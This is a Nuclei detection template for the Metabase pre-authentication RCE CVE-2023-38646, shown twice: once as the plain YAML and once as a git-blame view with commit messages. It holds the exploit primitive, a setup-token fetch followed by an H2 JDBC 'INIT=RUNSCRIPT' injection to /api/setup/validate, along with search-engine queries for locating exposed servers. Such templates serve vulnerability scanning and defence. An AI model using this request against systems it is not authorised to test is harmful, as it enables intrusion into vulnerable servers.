nuclei-templates/http/cves/2023/CVE-2023-38646.yaml

id: CVE-2023-38646

info:
  name: Metabase < 0.46.6.1 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Metabase to version 0.46.6.1 or later to mitigate this vulnerability.
  reference:
    - https://www.metabase.com/blog/security-advisory
    - https://github.com/metabase/metabase/releases/tag/v0.46.6.1
    - https://mp.weixin.qq.com/s/ATFwFl-D8k9QfQfzKjZFDg
    - https://news.ycombinator.com/item?id=36812256
    - https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
    - https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-38646
    epss-score: 0.91302
    epss-percentile: 0.98865
    cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: metabase
    product: metabase
    shodan-query:
      - http.title:"Metabase"
      - http.title:"metabase"
    fofa-query:
      - app="Metabase"
      - title="metabase"
      - app="metabase"
    google-query: intitle:"metabase"
  tags: cve2023,cve,metabase,oss,rce
variables:
  file: "./plugins/vertica.metabase-driver.jar"

http:
  - raw:
      - |
        GET /api/session/properties HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /api/setup/validate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "token":"{{token}}",
           "details":{
              "details":{
                 "subprotocol":"h2",
                 "classname":"org.h2.Driver",
                 "advanced-options":true,
                 "subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\;"
              },
              "name":"{{randstr}}",
              "engine":"postgres"
           }
        }

    extractors:
      - type: json
        part: body_1
        name: token
        json:
          - .["setup-token"]
        internal: true
    matchers:
      - type: dsl
        dsl:
          - contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException")
          - status_code_2 == 400
        condition: and
# digest: 490a004630440220430d6b3809d41f95f3490cfd06e099f7baa5b88b22f600e3333d56ac068d9b3502207e61d04694ef23ed0a6d7fec22487a8274ad68b76a2503eb1b785722c6355e69:922c64590222798bb761d5b6d8e72950
Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update 2023-07-28 19:49:14 +00:00			`id: CVE-2023-38646`

			`info:`
			`name: Metabase < 0.46.6.1 - Remote Code Execution`
			`author: rootxharsh,iamnoooob,pdresearch`
			`severity: critical`
			`description: \|`
			`Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`remediation: \|`
			`Upgrade Metabase to version 0.46.6.1 or later to mitigate this vulnerability.`
Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update 2023-07-28 19:49:14 +00:00			`reference:`
			`- https://www.metabase.com/blog/security-advisory`
			`- https://github.com/metabase/metabase/releases/tag/v0.46.6.1`
			`- https://mp.weixin.qq.com/s/ATFwFl-D8k9QfQfzKjZFDg`
			`- https://news.ycombinator.com/item?id=36812256`
			`- https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/`
			`- https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe`
			`classification:`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update 2023-07-28 19:49:14 +00:00			`cve-id: CVE-2023-38646`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.91302`
			`epss-percentile: 0.98865`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`cpe: cpe:2.3:a:metabase:metabase:::::-:::*`
Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update 2023-07-28 19:49:14 +00:00			`metadata:`
			`verified: true`
			`max-request: 2`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: metabase`
			`product: metabase`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- http.title:"Metabase"`
			`- http.title:"metabase"`
			`fofa-query:`
			`- app="Metabase"`
			`- title="metabase"`
			`- app="metabase"`
product/queries updated 2024-05-31 19:23:20 +00:00			`google-query: intitle:"metabase"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2023,cve,metabase,oss,rce`
Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update 2023-07-28 19:49:14 +00:00			`variables:`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`file: "./plugins/vertica.metabase-driver.jar"`
Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update 2023-07-28 19:49:14 +00:00
			`http:`
			`- raw:`
			`- \|`
			`GET /api/session/properties HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /api/setup/validate HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

			`{`
			`"token":"{{token}}",`
			`"details":{`
			`"details":{`
			`"subprotocol":"h2",`
			`"classname":"org.h2.Driver",`
			`"advanced-options":true,`
			`"subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\;"`
			`},`
			`"name":"{{randstr}}",`
			`"engine":"postgres"`
			`}`
			`}`

			`extractors:`
			`- type: json`
			`part: body_1`
			`name: token`
			`json:`
			`- .["setup-token"]`
			`internal: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException")`
			`- status_code_2 == 400`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`condition: and`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 490a004630440220430d6b3809d41f95f3490cfd06e099f7baa5b88b22f600e3333d56ac068d9b3502207e61d04694ef23ed0a6d7fec22487a8274ad68b76a2503eb1b785722c6355e69:922c64590222798bb761d5b6d8e72950`